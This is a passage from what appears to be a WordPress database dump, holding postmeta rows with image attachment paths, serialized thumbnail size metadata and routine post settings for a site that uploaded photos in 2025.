0_122236779104202781_4324879715934509579_n-768x534.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92272;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517253900_122236779104202781_4324879715934509579_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19495;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2074,652,'_wp_attached_file','2025/07/517587114_122236779326202781_2473954371845367166_n.jpg'),
(2075,653,'_wp_attached_file','2025/07/517570952_122236779188202781_5369874677855654429_n.jpg'),
(2076,652,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1031;s:6:\"height\";i:842;s:4:\"file\";s:62:\"2025/07/517587114_122236779326202781_2473954371845367166_n.jpg\";s:8:\"filesize\";i:104623;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517587114_122236779326202781_2473954371845367166_n-300x245.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17554;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517587114_122236779326202781_2473954371845367166_n-1024x836.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:836;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103491;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517587114_122236779326202781_2473954371845367166_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7591;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517587114_122236779326202781_2473954371845367166_n-768x627.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:627;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68439;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517587114_122236779326202781_2473954371845367166_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15549;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2077,654,'_wp_attached_file','2025/07/517451733_122236779278202781_1522907675236675485_n.jpg'),
(2078,653,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1464;s:6:\"height\";i:871;s:4:\"file\";s:62:\"2025/07/517570952_122236779188202781_5369874677855654429_n.jpg\";s:8:\"filesize\";i:249917;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517570952_122236779188202781_5369874677855654429_n-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13507;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517570952_122236779188202781_5369874677855654429_n-1024x609.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:609;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126445;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517570952_122236779188202781_5369874677855654429_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6638;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517570952_122236779188202781_5369874677855654429_n-768x457.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74726;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517570952_122236779188202781_5369874677855654429_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16190;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2079,654,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1108;s:4:\"file\";s:62:\"2025/07/517451733_122236779278202781_1522907675236675485_n.jpg\";s:8:\"filesize\";i:155842;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517451733_122236779278202781_1522907675236675485_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16130;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517451733_122236779278202781_1522907675236675485_n-1024x769.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91837;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517451733_122236779278202781_1522907675236675485_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7231;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517451733_122236779278202781_1522907675236675485_n-768x577.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60836;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517451733_122236779278202781_1522907675236675485_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14705;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2080,655,'_wp_attached_file','2025/07/517594604_122236779272202781_8916834928080989461_n.jpg'),
(2081,655,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1562;s:6:\"height\";i:1048;s:4:\"file\";s:62:\"2025/07/517594604_122236779272202781_8916834928080989461_n.jpg\";s:8:\"filesize\";i:297763;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517594604_122236779272202781_8916834928080989461_n-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17207;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517594604_122236779272202781_8916834928080989461_n-1024x687.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:687;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145591;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517594604_122236779272202781_8916834928080989461_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7660;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517594604_122236779272202781_8916834928080989461_n-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90294;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"517594604_122236779272202781_8916834928080989461_n-1536x1031.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1031;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:277244;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517594604_122236779272202781_8916834928080989461_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18701;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2082,656,'_wp_attached_file','2025/07/518287046_122236778510202781_8542291167795515244_n.jpg'),
(2083,656,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:763;s:6:\"height\";i:781;s:4:\"file\";s:62:\"2025/07/518287046_122236778510202781_8542291167795515244_n.jpg\";s:8:\"filesize\";i:79303;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518287046_122236778510202781_8542291167795515244_n-293x300.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22099;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518287046_122236778510202781_8542291167795515244_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7489;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518287046_122236778510202781_8542291167795515244_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19181;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2084,657,'_wp_attached_file','2025/07/518373994_122236779308202781_979526566635401952_n.jpg'),
(2085,657,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1490;s:6:\"height\";i:955;s:4:\"file\";s:61:\"2025/07/518373994_122236779308202781_979526566635401952_n.jpg\";s:8:\"filesize\";i:235512;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"518373994_122236779308202781_979526566635401952_n-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17238;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"518373994_122236779308202781_979526566635401952_n-1024x656.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128331;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"518373994_122236779308202781_979526566635401952_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8202;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"518373994_122236779308202781_979526566635401952_n-768x492.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:492;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81953;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"518373994_122236779308202781_979526566635401952_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2086,658,'_wp_attached_file','2025/07/516551442_122236779134202781_7691696061389877814_n.jpg'),
(2087,658,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2025/07/516551442_122236779134202781_7691696061389877814_n.jpg\";s:8:\"filesize\";i:526538;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"516551442_122236779134202781_7691696061389877814_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22722;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"516551442_122236779134202781_7691696061389877814_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180953;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"516551442_122236779134202781_7691696061389877814_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9217;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"516551442_122236779134202781_7691696061389877814_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190788;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"516551442_122236779134202781_7691696061389877814_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:328605;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"516551442_122236779134202781_7691696061389877814_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21791;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2090,649,'_thumbnail_id','655'),
(2091,649,'_edit_last','1'),
(2092,649,'title_style','default'),
(2093,649,'_title_style','field_5d1a0217cf408'),
(2094,649,'related',''),
(2095,649,'_related','field_603b51c3e183e'),
(2096,659,'title_style','default'),
(2097,659,'_title_style','field_5d1a0217cf408'),
(2098,659,'related',''),
(2099,659,'_related','field_603b51c3e183e'),
(2102,660,'_edit_lock','1752481908:1'),
(2103,661,'_wp_attached_file','2025/07/516551442_122236779134202781_7691696061389877814_n-1.jpg'),
(2104,661,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2025/07/516551442_122236779134202781_7691696061389877814_n-1.jpg\";s:8:\"filesize\";i:526538;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"516551442_122236779134202781_7691696061389877814_n-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22722;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"516551442_122236779134202781_7691696061389877814_n-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180953;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"516551442_122236779134202781_7691696061389877814_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9217;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"516551442_122236779134202781_7691696061389877814_n-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190788;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"516551442_122236779134202781_7691696061389877814_n-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:328605;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"516551442_122236779134202781_7691696061389877814_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21791;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2107,660,'_edit_last','1'),
(2108,660,'title_style','default'),
(2109,660,'_title_style','field_5d1a0217cf408'),
(2110,660,'related',''),
(2111,660,'_related','field_603b51c3e183e'),
(2112,662,'title_style','default'),
(2113,662,'_title_style','field_5d1a0217cf408'),
(2114,662,'related',''),
(2115,662,'_related','field_603b51c3e183e'),
(2119,660,'_thumbnail_id','661'),
(2126,664,'footnotes',''),
(2127,664,'title_style','default'),
(2128,664,'_title_style','field_5d1a0217cf408'),
(2129,665,'_edit_lock','1752481849:1'),
(2132,665,'_thumbnail_id','647'),
(2133,665,'_edit_last','1'),
(2134,665,'title_style','default'),
(2135,665,'_title_style','field_5d1a0217cf408'),
(2136,665,'related',''),
(2137,665,'_related','field_603b51c3e183e'),
(2138,666,'title_style','default'),
(2139,666,'_title_style','field_5d1a0217cf408'),
(2140,666,'related',''),
(2141,666,'_related','field_603b51c3e183e'),
(2152,667,'title_style','default'),
(2153,667,'_title_style','field_5d1a0217cf408'),
(2154,667,'related',''),
(2155,667,'_related','field_603b51c3e183e'),
(2156,668,'footnotes',''),
(2157,668,'title_style','default'),
(2158,668,'_title_style','field_5d1a0217cf408'),
(2159,669,'footnotes',''),
(2160,669,'title_style','default'),
(2161,669,'_title_style','field_5d1a0217cf408'),
(2162,670,'footnotes',''),
(2163,670,'title_style','default'),
(2164,670,'_title_style','field_5d1a0217cf408'),
(2166,672,'footnotes',''),
(2167,672,'title_style','default'),
(2168,672,'_title_style','field_5d1a0217cf408'),
(2169,673,'footnotes',''),
(2170,673,'title_style','default'),
(2171,673,'_title_style','field_5d1a0217cf408'),
(2172,674,'footnotes',''),
(2173,674,'title_style','default'),
(2174,674,'_title_style','field_5d1a0217cf408'),
(2175,675,'footnotes',''),
(2176,675,'title_style','default'),
(2177,675,'_title_style','field_5d1a0217cf408'),
(2178,676,'footnotes',''),
(2179,676,'title_style','default'),
(2180,676,'_title_style','field_5d1a0217cf408'),
(2181,677,'footnotes',''),
(2182,677,'title_style','default'),
(2183,677,'_title_style','field_5d1a0217cf408'),
(2185,679,'footnotes',''),
(2186,679,'title_style','default'),
(2187,679,'_title_style','field_5d1a0217cf408'),
(2189,681,'footnotes',''),
(2190,681,'title_style','default'),
(2191,681,'_title_style','field_5d1a0217cf408'),
(2192,682,'footnotes',''),
(2193,682,'title_style','default'),
(2194,682,'_title_style','field_5d1a0217cf408'),
(2196,684,'footnotes',''),
(2197,684,'title_style','default'),
(2198,684,'_title_style','field_5d1a0217cf408'),
(2199,685,'footnotes',''),
(2200,685,'title_style','default'),
(2201,685,'_title_style','field_5d1a0217cf408'),
(2202,686,'footnotes',''),
(2203,686,'title_style','default'),
(2204,686,'_title_style','field_5d1a0217cf408'),
(2205,687,'footnotes',''),
(2206,687,'title_style','default'),
(2207,687,'_title_style','field_5d1a0217cf408'),
(2209,689,'footnotes',''),
(2210,689,'title_style','default'),
(2211,689,'_title_style','field_5d1a0217cf408'),
(2212,690,'footnotes',''),
(2213,690,'title_style','default'),
(2214,690,'_title_style','field_5d1a0217cf408'),
(2215,691,'footnotes',''),
(2216,691,'title_style','default'),
(2217,691,'_title_style','field_5d1a0217cf408'),
(2219,693,'footnotes',''),
(2220,693,'title_style','default'),
(2221,693,'_title_style','field_5d1a0217cf408'),
(2222,694,'footnotes',''),
(2223,694,'title_style','default'),
(2224,694,'_title_style','field_5d1a0217cf408'),
(2225,695,'footnotes',''),
(2226,695,'title_style','default'),
(2227,695,'_title_style','field_5d1a0217cf408'),
(2228,696,'footnotes',''),
(2229,696,'title_style','default'),
(2230,696,'_title_style','field_5d1a0217cf408'),
(2231,697,'footnotes',''),
(2232,697,'title_style','default'),
(2233,697,'_title_style','field_5d1a0217cf408'),
(2235,699,'footnotes',''),
(2236,699,'title_style','default'),
(2237,699,'_title_style','field_5d1a0217cf408'),
(2238,700,'footnotes',''),
(2239,700,'title_style','default'),
(2240,700,'_title_style','field_5d1a0217cf408'),
(2241,701,'footnotes',''),
(2242,701,'title_style','default'),
(2243,701,'_title_style','field_5d1a0217cf408'),
(2244,702,'footnotes',''),
(2245,702,'title_style','default'),
(2246,702,'_title_style','field_5d1a0217cf408'),
(2248,704,'footnotes',''),
(2249,704,'title_style','default'),
(2250,704,'_title_style','field_5d1a0217cf408'),
(2251,705,'footnotes',''),
(2252,705,'title_style','default'),
(2253,705,'_title_style','field_5d1a0217cf408'),
(2254,706,'footnotes',''),
(2255,706,'title_style','default'),
(2256,706,'_title_style','field_5d1a0217cf408'),
(2257,707,'footnotes',''),
(2258,707,'title_style','default'),
(2259,707,'_title_style','field_5d1a0217cf408'),
(2260,708,'footnotes',''),
(2261,708,'title_style','default'),
(2262,708,'_title_style','field_5d1a0217cf408'),
(2264,710,'footnotes',''),
(2265,710,'title_style','default'),
(2266,710,'_title_style','field_5d1a0217cf408'),
(2267,711,'footnotes',''),
(2268,711,'title_style','default'),
(2269,711,'_title_style','field_5d1a0217cf408'),
(2270,712,'footnotes',''),
(2271,712,'title_style','default'),
(2272,712,'_title_style','field_5d1a0217cf408'),
(2273,713,'footnotes',''),
(2274,713,'title_style','default'),
(2275,713,'_title_style','field_5d1a0217cf408'),
(2277,715,'footnotes',''),
(2278,715,'title_style','default'),
(2279,715,'_title_style','field_5d1a0217cf408'),
(2280,716,'footnotes',''),
(2281,716,'title_style','default'),
(2282,716,'_title_style','field_5d1a0217cf408'),
(2283,717,'footnotes',''),
(2284,717,'title_style','default'),
(2285,717,'_title_style','field_5d1a0217cf408'),
(2286,718,'footnotes',''),
(2287,718,'title_style','default'),
(2288,718,'_title_style','field_5d1a0217cf408'),
(2289,719,'footnotes',''),
(2290,719,'title_style','default'),
(2291,719,'_title_style','field_5d1a0217cf408'),
(2292,720,'footnotes',''),
(2293,720,'title_style','default'),
(2294,720,'_title_style','field_5d1a0217cf408'),
(2295,721,'footnotes',''),
(2296,721,'title_style','default'),
(2297,721,'_title_style','field_5d1a0217cf408'),
(2298,722,'footnotes',''),
(2299,722,'title_style','default'),
(2300,722,'_title_style','field_5d1a0217cf408'),
(2301,723,'footnotes',''),
(2302,723,'title_style','default'),
(2303,723,'_title_style','field_5d1a0217cf408'),
(2305,725,'footnotes',''),
(2306,725,'title_style','default'),
(2307,725,'_title_style','field_5d1a0217cf408'),
(2308,726,'footnotes',''),
(2309,726,'title_style','default'),
(2310,726,'_title_style','field_5d1a0217cf408'),
(2311,727,'footnotes',''),
(2312,727,'title_style','default'),
(2313,727,'_title_style','field_5d1a0217cf408'),
(2314,728,'footnotes',''),
(2315,728,'title_style','default'),
(2316,728,'_title_style','field_5d1a0217cf408'),
(2318,730,'footnotes',''),
(2319,730,'title_style','default'),
(2320,730,'_title_style','field_5d1a0217cf408'),
(2321,731,'footnotes',''),
(2322,731,'title_style','default'),
(2323,731,'_title_style','field_5d1a0217cf408'),
(2324,732,'footnotes',''),
(2325,732,'title_style','default'),
(2326,732,'_title_style','field_5d1a0217cf408'),
(2327,733,'footnotes',''),
(2328,733,'title_style','default'),
(2329,733,'_title_style','field_5d1a0217cf408'),
(2330,736,'_wp_attached_file','2025/10/ผอ.วิชุดา.jpg'),
(2331,736,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1076;s:6:\"height\";i:1522;s:4:\"file\";s:37:\"2025/10/ผอ.วิชุดา.jpg\";s:8:\"filesize\";i:56328;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ผอ.วิชุดา-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8250;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ผอ.วิชุดา-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44471;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ผอ.วิชุดา-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4342;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"ผอ.วิชุดา-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48316;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ผอ.วิชุดา-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7094;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2333,19,'_thumbnail_id','741'),
(2334,738,'footnotes',''),
(2335,738,'title_style','default'),
(2336,738,'_title_style','field_5d1a0217cf408'),
(2338,740,'footnotes',''),
(2339,740,'title_style','default'),
(2340,740,'_title_style','field_5d1a0217cf408'),
(2341,741,'_wp_attached_file','2025/10/ผอ.jpg'),
(2342,741,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:235;s:6:\"height\";i:556;s:4:\"file\";s:18:\"2025/10/ผอ.jpg\";s:8:\"filesize\";i:18414;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ผอ-127x300.jpg\";s:5:\"width\";i:127;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9627;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ผอ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5325;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"ผอ-235x184.jpg\";s:5:\"width\";i:235;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7614;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:1